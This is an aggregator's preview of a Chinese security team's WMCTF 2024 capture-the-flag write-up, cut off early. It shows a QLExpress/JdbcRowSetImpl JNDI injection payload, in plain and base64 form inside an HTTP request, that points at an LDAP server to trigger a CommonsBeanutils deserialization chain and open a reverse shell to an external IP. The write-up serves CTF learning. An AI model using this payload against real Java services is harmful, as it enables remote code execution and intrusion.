注册    登录
专栏名称: 星盟安全
星盟安全工作室---“VENI VIDI VICI”(我来,我见,我征服),我们的征途是星辰大海。从事各类安全研究,专注于知识分享。
我也要提交微信公众号
今天看啥
微信公众号rss订阅, 微信rss, 稳定的RSS源
目录
相关文章推荐
爱生活的燃烧  ·  不温暖的都值得夸 ·  昨天  
爱生活的燃烧  ·  不温暖的都值得夸 ·  昨天  
今天看啥  ›  专栏  ›  星盟安全

WMCTF 2024 Writeup

星盟安全  · 公众号  ·  · 2024-09-24 17:48

文章预览

WEB 1 EzQl 分析 QLExpress触发任意setter和getter jdbcRowSetImpl打ldap打cb1.9.4即可 import com.sun.rowset.JdbcRowSetImpl;JdbcRowSetImpl a = new JdbcRowSetImpl();a.dataSourceName= "ldap://112.124.59.213:1389/Deserialize/CommonsBeanutils194/ReverseShell/112.124.59.213/4444" ;a.autoCommit= true ; http包 POST /ql HTTP/1.1 Content-Type : application/json Host : eci-2ze91xpcbnzj0bg2w169.cloudeci1.ichunqiu.com:8000 aW1wb3J0IGNvbS5zdW4ucm93c2V0LkpkYmNSb3dTZXRJbXBsO0pkYmNSb3dTZXRJbXBsIGEgPSBuZXcgSmRiY1Jvd1NldEltcGwoKTthLmRhdGFTb3VyY2VOYW1lPSJsZGFwOi8vMTEyLjEyNC41OS4yMTM6MTM4OS9EZXNlcmlhbGl6ZS9Db21tb25zQmVhbnV0aWxzMTk0L1JldmVyc2VTaGVsbC8xMTIuMTI0LjU5LjIxMy80NDQ0IjthLmF1dG9Db21taXQ9dHJ1ZTs\= PWN 1 babysign ; ModuleID = 'test.c' source_filename = "test.c" target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128" target triple = "x86_64-pc-linux-gnu" @.str = private unnamed_addr constant [ 7 x i8] c "./flag\00" , align 1 @.addr = dso_loc ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览
推荐文章
爱生活的燃烧  ·  不温暖的都值得夸
昨天
爱生活的燃烧  ·  不温暖的都值得夸
昨天
中国工商银行信用卡  ·  我们的老师,咋不知道累?
2 月前
Financial小伙伴  ·  ​4000点美女分析师,公开跟但斌大神「杠」上了
1 月前
雪中滚雪球  ·  加仓
1 月前
自动驾驶之星  ·  为何机器人难以打通「任督二脉」?
1 周前
关于   移动版   ·   Py中国   ·   RSS之家   ·   CodingPro   ·   Code   ·   Link之家   ·   卧龙AI搜索   ·   小百科
今天看啥 - 微信公众号rss订阅, 微信rss, 稳定的RSS源
© 2024 ~ 沪ICP备11025650号